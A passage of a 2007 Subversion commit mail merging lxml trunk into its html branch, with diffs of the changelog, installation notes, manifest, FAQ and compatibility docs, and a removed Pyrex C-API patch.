lxml/branch/html/tools/ - copied from r44623, lxml/trunk/tools/ lxml/branch/html/tools/xpathgrep.py - copied unchanged from r44623, lxml/trunk/tools/xpathgrep.py Removed: lxml/branch/html/Pyrex-0.9.4.1-public-api.patch lxml/branch/html/src/lxml/tests/test_xinclude.xml Modified: lxml/branch/html/CHANGES.txt lxml/branch/html/INSTALL.txt lxml/branch/html/MANIFEST.in lxml/branch/html/doc/FAQ.txt lxml/branch/html/doc/compatibility.txt lxml/branch/html/doc/html/style.css lxml/branch/html/doc/intro.txt lxml/branch/html/doc/main.txt lxml/branch/html/doc/objectify.txt lxml/branch/html/doc/parsing.txt lxml/branch/html/doc/performance.txt lxml/branch/html/doc/tutorial.txt lxml/branch/html/setup.py lxml/branch/html/setupinfo.py lxml/branch/html/src/lxml/ElementInclude.py lxml/branch/html/src/lxml/apihelpers.pxi lxml/branch/html/src/lxml/builder.py lxml/branch/html/src/lxml/etree.pyx lxml/branch/html/src/lxml/iterparse.pxi lxml/branch/html/src/lxml/objectify.pyx lxml/branch/html/src/lxml/parser.pxi lxml/branch/html/src/lxml/proxy.pxi lxml/branch/html/src/lxml/python.pxd lxml/branch/html/src/lxml/tests/test_elementtree.py lxml/branch/html/src/lxml/tests/test_etree.py lxml/branch/html/src/lxml/tests/test_htmlparser.py lxml/branch/html/src/lxml/tests/test_objectify.py lxml/branch/html/src/lxml/tree.pxd lxml/branch/html/src/lxml/xmlerror.pxi lxml/branch/html/src/lxml/xmlparser.pxd lxml/branch/html/src/lxml/xmlschema.pxi lxml/branch/html/version.txt lxml/branch/html/versioninfo.py Log: svn merge -r44104:HEAD http://codespeak.net/svn/lxml/trunk Modified: lxml/branch/html/CHANGES.txt ============================================================================== --- lxml/branch/html/CHANGES.txt (original) +++ lxml/branch/html/CHANGES.txt Fri Jun 29 19:05:43 2007 @@ -2,18 +2,18 @@ lxml changelog ============== -Under Development +Under development ================= Features added -------------- +* E-factory support for lxml.objectify (``objectify.E``) + * Entity support through an ``Entity`` factory and element classes. XML parsers now have a ``resolve_entities`` keyword argument that can be set to False to keep entities in the document. -* ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. - * ``column`` field on error log entries to accompany the ``line`` field * Error specific messages in XPath parsing and evaluation @@ -23,75 +23,65 @@ * The regular expression functions in XPath now support passing a node-set instead of a string -* ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support - adding processing instructions and comments around the root node - -* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods - -* Extended type annotation in objectify: cleaner annotation namespace setup - plus new ``xsiannotate()`` and ``deannotate()`` functions - -* Support for custom Element class instantiation in lxml.sax: passing a - ``makeelement`` function to the ElementTreeContentHandler will reuse the - lookup context of that function - -* '.' represents empty ObjectPath (identity) +* Extended type annotation in objectify: new ``xsiannotate()`` function * EXSLT RegExp support in standard XPath (not only XSLT) -* ``lxml.pyclasslookup`` module that can access the entire tree in read-only - mode to help determining a suitable Element class - -* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` - -* ``collectAttributes()`` C-function to build a list of attribute - keys/values/items for a libxml2 node - Bugs fixed ---------- * ``Element.getiterator(tag)`` did not accept ``Comment`` and ``ProcessingInstruction`` as tags +* Reference-counting bug in ``Element.attrib.pop()`` + * The XML parser did not report undefined entities as error * The text in exceptions raised by XML parsers, validators and XPath evaluators now reports the first error that occurred instead of the last -* XSLT parsing failed to pass resolver context on to imported documents +* passing '' as XPath namespace prefix did not raise an error -* ``ETXPath`` was missing the ``regexp`` keyword argument +* Thread safety in XPath evaluators -* passing '' as XPath namespace prefix did not raise an error +Other changes +------------- -* passing '' as namespace prefix in nsmap could be passed through to libxml2 +* major refactoring in XPath/XSLT extension function code -* Objectify couldn't handle prefixed XSD type names in ``xsi:type`` -* More ET compatible behaviour when writing out XML declarations or not +1.3 (2007-06-24) +================ -* More robust error handling in ``iterparse()`` +Features added +-------------- -* Documents lost their top-level PIs and comments on serialisation +* Module ``lxml.pyclasslookup`` module implements an Element class lookup + scheme that can access the entire tree in read-only mode to help determining + a suitable Element class -* lxml.sax failed on comments and PIs. Comments are now properly ignored and - PIs are copied. +* Parsers take a ``remove_comments`` keyword argument that skips over comments -* Thread safety in XPath evaluators +* ``parse()`` function in ``objectify``, corresponding to ``XML()`` etc. -* Raise AssertionError when passing strings containing '\0' bytes +* ``Element.addnext(el)`` and ``Element.addprevious(el)`` methods to support + adding processing instructions and comments around the root node -Other changes -------------- +* ``Element.attrib`` was missing ``clear()`` and ``pop()`` methods -* major refactoring in XPath/XSLT extension function code +* Extended type annotation in objectify: cleaner annotation namespace setup + plus new ``deannotate()`` function + +* Support for custom Element class instantiation in lxml.sax: passing a + ``makeelement`` function to the ElementTreeContentHandler will reuse the + lookup context of that function +* '.' represents empty ObjectPath (identity) -1.3beta (2007-02-27) -==================== +* ``Element.values()`` to accompany the existing ``.keys()`` and ``.items()`` -Features added --------------- +* ``collectAttributes()`` C-function to build a list of attribute + keys/values/items for a libxml2 node * ``DTD`` validator class (like ``RelaxNG`` and ``XMLSchema``) @@ -109,6 +99,35 @@ Bugs fixed ---------- +* Removing Elements from a tree could make them loose their namespace + declarations + +* ``ElementInclude`` didn't honour base URL of original document + +* Replacing the children slice of an Element would cut off the tails of the + original children + +* ``Element.getiterator(tag)`` did not accept ``Comment`` and + ``ProcessingInstruction`` as tags + +* API functions now check incoming strings for XML conformity. Zero bytes or + low ASCII characters are no longer accepted (AssertionError). + +* XSLT parsing failed to pass resolver context on to imported documents + +* passing '' as namespace prefix in nsmap could be passed through to libxml2 + +* Objectify couldn't handle prefixed XSD type names in ``xsi:type`` + +* More ET compatible behaviour when writing out XML declarations or not + +* More robust error handling in ``iterparse()`` + +* Documents lost their top-level PIs and comments on serialisation + +* lxml.sax failed on comments and PIs. Comments are now properly ignored and + PIs are copied. + * Possible memory leaks in namespace handling when moving elements between documents Modified: lxml/branch/html/INSTALL.txt ============================================================================== --- lxml/branch/html/INSTALL.txt (original) +++ lxml/branch/html/INSTALL.txt Fri Jun 29 19:05:43 2007 @@ -8,10 +8,12 @@ You need libxml2 and libxslt, in particular: -* libxml 2.6.16 or later. It can be found here: +* libxml 2.6.20 or later. It can be found here: http://xmlsoft.org/downloads.html -* libxslt 1.1.12 or later. It can be found here: + If you want to use XPath reliably, try to avoid libxml2 2.6.27. + +* libxslt 1.1.15 or later. It can be found here: http://xmlsoft.org/XSLT/downloads.html Newer versions generally contain less bugs and are therefore recommended. The @@ -19,30 +21,31 @@ parsing horribly broken HTML. XML Schema support is also still worked on in libxml2, so newer versions will give you better complience with the W3C spec. -For Windows, there is a `binary distribution`_ of libxml2 and libxslt. Note -that you need both libxml2 and libxslt, as well as iconv and zlib. You can -then install the `binary egg distribution`_ of lxml (see below). -.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html -.. _`binary egg distribution`: http://cheeseshop.python.org/pypi/lxml +Installation +------------ -On MacOS-X 10.4, you can use the installed system libraries and the binary egg -distribution of lxml. Note that the libxslt version on this system is older -than the required version above. While there were not any bug reports so far, -you may still encounter certain differences in behaviour in rare cases. - -If you want to build lxml from SVN, you also need Pyrex_. Please read `how to -build lxml from source`_ in this case. If you are using a released version of -lxml, it should come with the generated C file in the source distribution, so -no Pyrex is needed in that case. +If you have easy_install_, you can run the following as super-user (or +administrator):: + + easy_install lxml + +.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall + +This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as +libxml2 and libxslt are properly installed (including development packages, +i.e. header files etc.). -.. _Pyrex: http://www.cosc.canterbury.ac.nz/~greg/python/Pyrex/ -.. _`how to build lxml from source`: build.html -Note that Pyrex up to and including version 0.9.4 has known problems when -compiling lxml with gcc 4.0 or Python 2.4. Do not use it. If you want to -build lxml from non-release sources, please install Pyrex version 0.9.4.1 or -later. +Building lxml from sources +-------------------------- + +If you want to build lxml from SVN you should read `how to build lxml from +source`_ (or the file ``build.txt`` in the ``doc`` directory of the source +tree). Both the subversion sources and the source distribution ship with an +adapted version of Pyrex, so you do not need Pyrex installed. + +.. _`how to build lxml from source`: build.html If you have read these instructions and still cannot manage to install lxml, you can check the archives of the `mailing list`_ to see if your problem is @@ -51,16 +54,30 @@ .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev -Installation ------------- +MS Windows +---------- -If you have easy_install_, you can run the following as super-user:: +For MS Windows, the `binary egg distribution of lxml`_ is statically built +against the libraries, i.e. it already includes them. There is no need to +install the external libraries if you use an official lxml build from +cheeseshop. + +If you want to upgrade the libraries and/or compile lxml from sources, you +should install a `binary distribution`_ of libxml2 and libxslt. You need both +libxml2 and libxslt, as well as iconv and zlib. - easy_install lxml +.. _`binary distribution`: http://www.zlatkovic.com/libxml.en.html +.. _`binary egg distribution of lxml`: http://cheeseshop.python.org/pypi/lxml -.. _easy_install: http://peak.telecommunity.com/DevCenter/EasyInstall -This has been reported to work on Linux, MacOS-X 10.4 and Windows, as long as -libxml2 and libxslt are properly installed. To compile and install lxml -without easy_install, please read `how to build lxml from source`_ (or the -file ``build.txt`` in the ``doc`` directory of the source tree). +MacOS-X +------- + +On MacOS-X 10.4, you can try to use the installed system libraries when you +build lxml yourself. However, the library versions on this system are older +than the required versions, so you may encounter certain differences in +behaviour or even crashes. A number of users reported success with updated +libraries (e.g. using fink_), but needed to set the environment variable +``DYLD_LIBRARY_PATH`` to the directory where fink keeps the libraries. + +.. _fink: http://finkproject.org/ Modified: lxml/branch/html/MANIFEST.in ============================================================================== --- lxml/branch/html/MANIFEST.in (original) +++ lxml/branch/html/MANIFEST.in Fri Jun 29 19:05:43 2007 @@ -5,10 +5,12 @@ include MANIFEST.in version.txt include CHANGES.txt CREDITS.txt INSTALL.txt LICENSES.txt README.txt TODO.txt recursive-include src *.pyx *.pxd *.pxi *.py -recursive-include src/lxml etree.c objectify.c etree.h etree_defs.h +recursive-include src/lxml etree.c objectify.c pyclasslookup.c etree.h etree_defs.h recursive-include src/lxml/tests *.rng *.xslt *.xml *.dtd recursive-include benchmark *.py recursive-include doc *.txt *.html *.css *.xml *.mgp pubkey.asc -recursive-include Pyrex *.py +include Pyrex/__init__.py +recursive-include Pyrex/Compiler *.py +recursive-include Pyrex/Distutils *.py include doc/mkhtml.py doc/rest2html.py exclude doc/pyrex.txt src/lxml/etree.pxi Deleted: /lxml/branch/html/Pyrex-0.9.4.1-public-api.patch ============================================================================== --- /lxml/branch/html/Pyrex-0.9.4.1-public-api.patch Fri Jun 29 19:05:43 2007 +++ (empty file) @@ -1,239 +0,0 @@ -Index: Pyrex/Compiler/Nodes.py -=================================================================== ---- Pyrex/Compiler/Nodes.py (Revision 151) -+++ Pyrex/Compiler/Nodes.py (Arbeitskopie) -@@ -114,24 +114,28 @@ - self.generate_h_code(env, result) - - def generate_h_code(self, env, result): -- public_vars_and_funcs = [] -+ public_vars = [] -+ public_funcs = [] - public_extension_types = [] - for entry in env.var_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_vars.append(entry) - for entry in env.cfunc_entries: - if entry.visibility == 'public': -- public_vars_and_funcs.append(entry) -+ public_funcs.append(entry) - for entry in env.c_class_entries: - if entry.visibility == 'public': - public_extension_types.append(entry) -- if public_vars_and_funcs or public_extension_types: -+ if public_vars or public_funcs or public_extension_types: - result.h_file = replace_suffix(result.c_file, ".h") - result.i_file = replace_suffix(result.c_file, ".pxi") - h_code = Code.CCodeWriter(result.h_file) - i_code = Code.PyrexCodeWriter(result.i_file) -+ header_barrier = "__HAS_PYX_" + env.module_name -+ h_code.putln("#ifndef %s" % header_barrier) -+ h_code.putln("#define %s" % header_barrier) - self.generate_extern_c_macro_definition(h_code) -- for entry in public_vars_and_funcs: -+ for entry in public_vars: - h_code.putln("%s %s;" % ( - Naming.extern_c_macro, - entry.type.declaration_code( -@@ -141,7 +145,23 @@ - for entry in public_extension_types: - self.generate_cclass_header_code(entry.type, h_code) - self.generate_cclass_include_code(entry.type, i_code) -+ if public_funcs: -+ for entry in public_funcs: -+ h_code.putln( -+ 'static %s;' % -+ entry.type.declaration_code("(*%s)" % entry.cname)) -+ i_code.putln("cdef extern %s" % -+ entry.type.declaration_code(entry.cname, pyrex = 1)) -+ h_code.putln( -+ "static struct {char *s; void **p;} _%s_API[] = {" % -+ env.module_name) -+ for entry in public_funcs: -+ h_code.putln('{"%s", &%s},' % (entry.cname, entry.cname)) -+ h_code.putln("{0, 0}") -+ h_code.putln("};") -+ self.generate_c_api_import_code(env, h_code) - h_code.putln("PyMODINIT_FUNC init%s(void);" % env.module_name) -+ h_code.putln("#endif /* %s */" % header_barrier) - - def generate_cclass_header_code(self, type, h_code): - #h_code.putln("extern DL_IMPORT(PyTypeObject) %s;" % type.typeobj_cname) -@@ -180,6 +200,7 @@ - self.body.generate_function_definitions(env, code) - self.generate_interned_name_table(env, code) - self.generate_py_string_table(env, code) -+ self.generate_c_api_table(env, code) - self.generate_typeobj_definitions(env, code) - self.generate_method_table(env, code) - self.generate_filename_init_prototype(code) -@@ -437,10 +458,12 @@ - dll_linkage = None - header = entry.type.declaration_code(entry.cname, - dll_linkage = dll_linkage) -- if entry.visibility <> 'private': -+ if entry.visibility == 'private': -+ storage_class = "static " -+ elif entry.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s; /*proto*/" % ( - storage_class, - header)) -@@ -1090,6 +1113,63 @@ - code.putln( - "};") - -+ def generate_c_api_table(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry.cname) -+ if public_funcs: -+ env.use_utility_code(c_api_import_code); -+ code.putln( -+ "static __Pyx_CApiTabEntry %s[] = {" % -+ Naming.c_api_tab_cname) -+ public_funcs.sort() -+ for entry_cname in public_funcs: -+ code.putln('{"%s", %s},' % (entry_cname, entry_cname)) -+ code.putln( -+ "{0, 0}") -+ code.putln( -+ "};") -+ -+ def generate_c_api_import_code(self, env, h_code): -+ # this is written to the header file! -+ h_code.put(""" -+ /* Return -1 and set exception on error, 0 on success. */ -+ static int -+ import_%(name)s(PyObject *module) -+ { -+ if (module != NULL) { -+ PyObject *c_api_init = PyObject_GetAttrString( -+ module, "_import_c_api"); -+ if (!c_api_init) -+ return -1; -+ if (PyCObject_Check(c_api_init)) -+ { -+ int (*init)(struct {const char *s; const void **p;}*) = -+ PyCObject_AsVoidPtr(c_api_init); -+ if (!init) { -+ PyErr_SetString(PyExc_RuntimeError, -+ "module returns NULL pointer for C API call"); -+ return -1; -+ } -+ init(_%(name)s_API); -+ } -+ Py_DECREF(c_api_init); -+ } -+ return 0; -+ } -+ """.replace('\n ', '\n') % {'name' : env.module_name}) -+ -+ def generate_c_api_init_code(self, env, code): -+ public_funcs = [] -+ for entry in env.cfunc_entries: -+ if entry.visibility == 'public': -+ public_funcs.append(entry) -+ if public_funcs: -+ code.putln('if (__Pyx_InitCApi(%s) < 0) %s' % ( -+ Naming.module_cname, -+ code.error_goto(self.pos))) -+ - def generate_filename_init_prototype(self, code): - code.putln(""); - code.putln("static void %s(void); /*proto*/" % Naming.fileinit_cname) -@@ -1109,6 +1189,8 @@ - self.generate_intern_code(env, code) - #code.putln("/*--- String init code ---*/") - self.generate_string_init_code(env, code) -+ #code.putln("/*--- External C API setup code ---*/") -+ self.generate_c_api_init_code(env, code) - #code.putln("/*--- Global init code ---*/") - self.generate_global_init_code(env, code) - #code.putln("/*--- Type import code ---*/") -@@ -1862,10 +1944,12 @@ - dll_linkage = None - header = self.return_type.declaration_code(entity, - dll_linkage = dll_linkage) -- if self.visibility <> 'private': -+ if self.visibility == 'private': -+ storage_class = "static " -+ elif self.visibility == 'extern': - storage_class = "%s " % Naming.extern_c_macro - else: -- storage_class = "static " -+ storage_class = "" - code.putln("%s%s {" % ( - storage_class, - header)) -@@ -3550,6 +3634,7 @@ - - utility_function_predeclarations = \ - """ -+typedef struct {const char *s; const void **p;} __Pyx_CApiTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s;} __Pyx_InternTabEntry; /*proto*/ - typedef struct {PyObject **p; char *s; long n;} __Pyx_StringTabEntry; /*proto*/ - static PyObject *__Pyx_UnpackItem(PyObject *, Py_ssize_t); /*proto*/ -@@ -3572,6 +3657,8 @@ - static PyObject *__Pyx_CreateClass(PyObject *bases, PyObject *dict, PyObject *name, char *modname); /*proto*/ - static int __Pyx_InternStrings(__Pyx_InternTabEntry *t); /*proto*/ - static int __Pyx_InitStrings(__Pyx_StringTabEntry *t); /*proto*/ -+static int __Pyx_InitCApi(PyObject *module); /*proto*/ -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t); /*proto*/ - """ - - get_name_predeclaration = \ -@@ -4056,3 +4143,37 @@ - """; - - #------------------------------------------------------------------------------------ -+ -+c_api_import_code = \ -+""" -+static int __Pyx_ImportModuleCApi(__Pyx_CApiTabEntry *t) { -+ __Pyx_CApiTabEntry *api_t; -+ while (t->s) { -+ if (*t->s == '\0') -+ continue; /* shortcut for erased string entries */ -+ api_t = %(API_TAB)s; -+ while ((api_t->s) && (strcmp(api_t->s, t->s) < 0)) -+ ++api_t; -+ if ((!api_t->p) || (strcmp(api_t->s, t->s) != 0)) { -+ PyErr_Format(PyExc_ValueError, -+ "Unknown function name in C API: %%s", t->s); -+ return -1; -+ } -+ *t->p = api_t->p; -+ ++t; -+ } -+ return 0; -+} -+ -+static int __Pyx_InitCApi(PyObject *module) { -+ int result; -+ PyObject* cobj = PyCObject_FromVoidPtr(&__Pyx_ImportModuleCApi, NULL); -+ if (!cobj) -+ return -1; -+ -+ result = PyObject_SetAttrString(module, "_import_c_api", cobj); -+ Py_DECREF(cobj); -+ return result; -+} -+""" % {'API_TAB' : Naming.c_api_tab_cname} -+#------------------------------------------------------------------------------------ -Index: Pyrex/Compiler/Naming.py -=================================================================== ---- Pyrex/Compiler/Naming.py (Revision 151) -+++ Pyrex/Compiler/Naming.py (Arbeitskopie) -@@ -50,5 +50,6 @@ - self_cname = pyrex_prefix + "self" - stringtab_cname = pyrex_prefix + "string_tab" - vtabslot_cname = pyrex_prefix + "vtab" -+c_api_tab_cname = pyrex_prefix + "c_api_tab" - - extern_c_macro = pyrex_prefix.upper() + "EXTERN_C" Modified: lxml/branch/html/doc/FAQ.txt ============================================================================== --- lxml/branch/html/doc/FAQ.txt (original) +++ lxml/branch/html/doc/FAQ.txt Fri Jun 29 19:05:43 2007 @@ -6,8 +6,8 @@ :description: Frequently Asked Questions about lxml (FAQ) :keywords: lxml, lxml.etree, FAQ, frequently asked questions - -See also the notes on compatibility_ to ElementTree_. +Frequently asked questions on lxml. See also the notes on compatibility_ to +ElementTree_. .. _compatibility: compatibility.html .. _ElementTree: http://effbot.org/zone/element-index.htm @@ -18,30 +18,32 @@ 1.1 Is there a tutorial? 1.2 Where can I find more documentation about lxml? 1.3 What standards does lxml implement? - 1.4 Where are the Windows binaries? - 1.5 What is the difference between lxml.etree and lxml.objectify? - 1.6 How can I make my application run faster? - 1.7 Why do I get errors about missing UCS4 symbols when installing lxml? - 2 Contributing - 2.1 Why is lxml not written in Python? - 2.2 How can I contribute? - 3 Bugs - 3.1 My application crashes! Why does lxml.etree do that? - 3.2 I think I have found a bug in lxml. What should I do? - 4 Threading - 4.1 Can I use threads to concurrently access the lxml API? - 4.2 Does my program run faster if I use threads? - 4.3 Would my single-threaded program run faster if I turned off threading? - 5 Parsing and Serialisation - 5.1 Why doesn't the ``pretty_print`` option reformat my XML output? - 5.2 Why can't lxml parse my XML from unicode strings? - 5.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? - 5.4 Why can't I just delete parents or clear the root node in iterparse()? - 6 XPath and Document Traversal - 6.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? - 6.2 Why doesn't ``findall()`` support full XPath expressions? - 6.3 How can I find out which namespace prefixes are used in a document? - 6.4 How can I specify a default namespace for XPath expressions? + 1.4 What is the difference between lxml.etree and lxml.objectify? + 1.5 How can I make my application run faster? + 2 Installation + 2.1 Which version of libxml2 and libxslt should I use or require? + 2.2 Where are the Windows binaries? + 2.3 Why do I get errors about missing UCS4 symbols when installing lxml? + 3 Contributing + 3.1 Why is lxml not written in Python? + 3.2 How can I contribute? + 4 Bugs + 4.1 My application crashes! + 4.2 I think I have found a bug in lxml. What should I do? + 5 Threading + 5.1 Can I use threads to concurrently access the lxml API? + 5.2 Does my program run faster if I use threads? + 5.3 Would my single-threaded program run faster if I turned off threading? + 6 Parsing and Serialisation + 6.1 Why doesn't the ``pretty_print`` option reformat my XML output? + 6.2 Why can't lxml parse my XML from unicode strings? + 6.3 What is the difference between str(xslt(doc)) and xslt(doc).write() ? + 6.4 Why can't I just delete parents or clear the root node in iterparse()? + 7 XPath and Document Traversal + 7.1 What are the ``findall()`` and ``xpath()`` methods on Element(Tree)? + 7.2 Why doesn't ``findall()`` support full XPath expressions? + 7.3 How can I find out which namespace prefixes are used in a document? + 7.4 How can I specify a default namespace for XPath expressions? General Questions @@ -50,10 +52,16 @@ Is there a tutorial? -------------------- -There is a `tutorial for ElementTree`_ which also works for ``lxml.etree``. +Read the `lxml.etree Tutorial`_. While this is still work in progress (just +as any good documentation), it provides an overview of the most important +concepts in ``lxml.etree``. If you want to help out, the tutorial is a very +good place to start. + +There is also a `tutorial for ElementTree`_ which works for ``lxml.etree``. The `API documentation`_ also contains many examples for ``lxml.etree``. To learn using ``lxml.objectify``, read the `objectify documentation`_. +.. _`lxml.etree Tutorial`: tutorial.html .. _`tutorial for ElementTree`: http://effbot.org/zone/element.htm .. _`API documentation`: api.html .. _`objectify documentation`: objectify.html @@ -83,7 +91,7 @@ strictly compliant way. As of release 2.4.16, libxml2 passed all 1800+ tests from the OASIS XML Tests Suite. -lxml currently supports libxml2 2.6.16 or later, which has even better support +lxml currently supports libxml2 2.6.20 or later, which has even better support for various XML standards. Some of the more important ones are: HTML, XML namespaces, XPath, XInclude, XSLT, XML catalogs, canonical XML, RelaxNG, XML:ID. Support for XML Schema and Schematron is currently incomplete in @@ -91,32 +99,6 @@ supports loading documents through HTTP and FTP. -Where are the Windows binaries? -------------------------------- - -Short answer: If you want to contribute a binary build, we are happy to put it -up on the Cheeseshop. - -Long answer: Two of the bigger problems with the Windows system are the lack -of a pre-installed standard compiler and the missing package management. Both -make it non-trivial to build lxml on this platform. We are trying hard to -make lxml as platform-independent as possible and it is regularly tested on -Windows systems. However, we currently cannot provide Windows binary -distributions ourselves. - -From time to time, users of different environments kindly contribute binary -builds of lxml, most frequently for Windows or Mac-OS X. We put these on the -Cheeseshop to make it as easy as possible for others to use lxml on their -platform. - -If there is not currently a binary distribution of the most recent lxml -release for your platform available from the Cheeseshop, please look through -the older versions to see if they provide a binary build. This is done by -appending the version number to the cheeseshop URL, e.g.: - - http://cheeseshop.python.org/pypi/lxml/1.1.2 - - What is the difference between lxml.etree and lxml.objectify? ------------------------------------------------------------- @@ -159,6 +141,63 @@ .. _threading: #threading +Installation +============ + +Which version of libxml2 and libxslt should I use or require? +------------------------------------------------------------- + +It really depends on your application, but the rule of thumb is: more recent +versions contain less bugs and provide more features. + +* Try to use versions of both libraries that were released together. At least + the libxml2 version should not be older than the libxslt version. + +* If you use XML Schema or Schematron which are still under development, the + most recent version of libxml2 is usually a good bet. + +* The same applies to XPath, where a substantial number of bugs and memory + leaks were fixed over time. If you encounter crashes or memory leaks in + XPath applications, try a more recent version of libxml2. + +* For parsing and fixing broken HTML, lxml requires at least libxml2 2.6.21. + +* For the normal tree handling, however, any libxml2 version starting with + 2.6.20 should do. + +Read the `release notes of libxml2`_ and the `release notes of libxslt`_ to +see when (or if) a specific bug has been fixed. + +.. _`release notes of libxml2`: http://xmlsoft.org/news.html +.. _`release notes of libxslt`: http://xmlsoft.org/XSLT/news.html + + +Where are the Windows binaries? +------------------------------- + +Short answer: If you want to contribute a binary build, we are happy to put it +up on the Cheeseshop. + +Long answer: Two of the bigger problems with the Windows system are the lack +of a pre-installed standard compiler and the missing package management. Both +make it non-trivial to build lxml on this platform. We are trying hard to +make lxml as platform-independent as possible and it is regularly tested on +Windows systems. However, we currently cannot provide Windows binary +distributions ourselves. + +From time to time, users of different environments kindly contribute binary +builds of lxml, most frequently for Windows or Mac-OS X. We put these on the +Cheeseshop to make it as easy as possible for others to use lxml on their +platform. + +If there is not currently a binary distribution of the most recent lxml +release for your platform available from the Cheeseshop, please look through +the older versions to see if they provide a binary build. This is done by +appending the version number to the cheeseshop URL, e.g.: + + http://cheeseshop.python.org/pypi/lxml/1.1.2 + + Why do I get errors about missing UCS4 symbols when installing lxml? -------------------------------------------------------------------- @@ -228,6 +267,11 @@ .. _ReST: http://docutils.sourceforge.net/rst.html .. _`text files`: http://codespeak.net/svn/lxml/trunk/doc/ +* help with the tutorial. A tutorial is the most important stating point for + new users, so it is important for us to provide an easy to understand guide + into lxml. As allo documentation, the tutorial is work in progress, so we + appreciate every helping hand. + * improve the docstrings. lxml uses docstrings to support Python's integrated online ``help()`` function. However, sometimes these are not sufficient to grasp the details of the function in question. If you find such a place, @@ -238,45 +282,68 @@ Bugs ==== -My application crashes! Why does lxml.etree do that? ----------------------------------------------------- +My application crashes! +----------------------- One of the goals of lxml is "no segfaults", so if there is no clear warning in the documentation that you were doing something potentially harmful, you have found a bug and we would like to hear about it. Please report this bug to the `mailing list`_. See the next section on how to do that. +However, there are a few things to try first, to make sure the problem is +really within lxml (or libxml2 or libxslt): -I think I have found a bug in lxml. What should I do? ------------------------------------------------------ - -a) First, you should look at the `current developer changelog`_ to see if this - is a known problem that has already been fixed in the SVN trunk. +a) If your application (or e.g. your web container) uses threads, please see + the FAQ section on threading to check if you touch on one of the + potential pitfalls. + +b) If you are on Mac-OS X, make sure lxml uses the correct libraries. If you + have updated the old system libraries (e.g. through fink), this is best + achieved by building lxml statically to prevent the different library + versions from interfering. If you choose to use a dynamically linked + version, make sure the ``DYLD_LIBRARY_PATH`` environment variable + contains the directory where you installed the libraries. + +In any case, try to reproduce the problem with the latest versions of +libxml2 and libxslt. From time to time, bugs and race conditions are found +in these libraries, so a more recent version might already contain a fix for +your problem. - .. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt -b) If you are using threads, please see the following section to check if - you touch on one of the potential pitfalls. +I think I have found a bug in lxml. What should I do? +----------------------------------------------------- -c) Try to reproduce the problem with the latest versions of libxml2 and - libxslt. From time to time, bugs and race conditions are found in these - libraries, so a more recent version might already contain a fix for your - problem. - -d) Otherwise, we would really like to hear about it. Please report it to the - `mailing list`_ so that we can fix it. It is very helpful in this case if - you can come up with a short code snippet that demonstrates your problem. - Please also report the version of lxml, libxml2 and libxslt that you are - using by calling this:: - - from lxml import etree - print "lxml.etree: ", etree.LXML_VERSION - print "libxml used: ", etree.LIBXML_VERSION - print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION - print "libxslt used: ", etree.LIBXSLT_VERSION - print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION +First, you should look at the `current developer changelog`_ to see if this +is a known problem that has already been fixed in the SVN trunk since the +release you are using. + +.. _`current developer changelog`: http://codespeak.net/svn/lxml/trunk/CHANGES.txt + +Also, the 'crash' section above has a few good advices what to try to see if +the problem is really in lxml - and not in your setup. Believe it or not, +that happens more often than you might think, especially when old libraries +or even multiple library versions are installed. + +You should always try to reproduce the problem with the latest versions of +libxml2 and libxslt - and make sure they are used (``lxml.etree`` can tell +you what it runs with, see below). + +Otherwise, we would really like to hear about it. Please report it to the +`mailing list`_ so that we can fix it. It is very helpful in this case if +you can come up with a short code snippet that demonstrates your problem. +If others can reproduce and see the problem, it is much easier for them to +fix it - and maybe even easier for you to describe it and get people +convinced that it really is a problem to fix. Please also report the +version of lxml, libxml2 and libxslt that you are using by calling this:: + + from lxml import etree + print "lxml.etree: ", etree.LXML_VERSION + print "libxml used: ", etree.LIBXML_VERSION + print "libxml compiled: ", etree.LIBXML_COMPILED_VERSION + print "libxslt used: ", etree.LIBXSLT_VERSION + print "libxslt compiled: ", etree.LIBXSLT_COMPILED_VERSION - .. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev +.. _`mailing list`: http://codespeak.net/mailman/listinfo/lxml-dev Threading Modified: lxml/branch/html/doc/compatibility.txt ============================================================================== --- lxml/branch/html/doc/compatibility.txt (original) +++ lxml/branch/html/doc/compatibility.txt Fri Jun 29 19:05:43 2007 @@ -1,3 +1,4 @@ +============================= lxml.etree versus ElementTree ============================= @@ -25,12 +26,8 @@ # use from lxml import etree as ElementTree -* Some minor parts of the API of ElementTree have not yet been implemented and - are thus missing in lxml.etree. Feel free to help out! - -* Then again, lxml.etree offers a lot more functionality, such as - XPath, XSLT, Relax NG, and XML Schema support, which (c)ElementTree - does not offer. +* lxml.etree offers a lot more functionality, such as XPath, XSLT, Relax NG, + and XML Schema support, which (c)ElementTree does not offer. * etree has a different idea about Python unicode strings than ElementTree. In most parts of the API, ElementTree uses plain strings and unicode strings @@ -77,32 +74,40 @@ - Unfortunately this is a rather fundamental difference in behavior, which - will be hard to solve. It won't affect some applications, but if you want - to port code you must unfortunately make sure that it doesn't. + Unfortunately this is a rather fundamental difference in behavior, which is + hard to change. It won't affect some applications, but if you want to port + code you must unfortunately make sure that it doesn't affect yours. + +* etree allows navigation to the parent of a node by the ``getparent()`` + method and to the siblings by calling ``getnext()`` and ``getprevious()``. + This is not possible in ElementTree as the underlying tree model does not + have this information. * When trying to set a subelement using __setitem__ that is in fact not an Element but some other object, etree raises a TypeError, and ElementTree raises an AssertionError. This also applies to some other places of the - API. In general, etree tries to avoid AssertionErrors in favour of being + API. In general, etree tries to avoid AssertionErrors in favour of being more specific about the reason for the 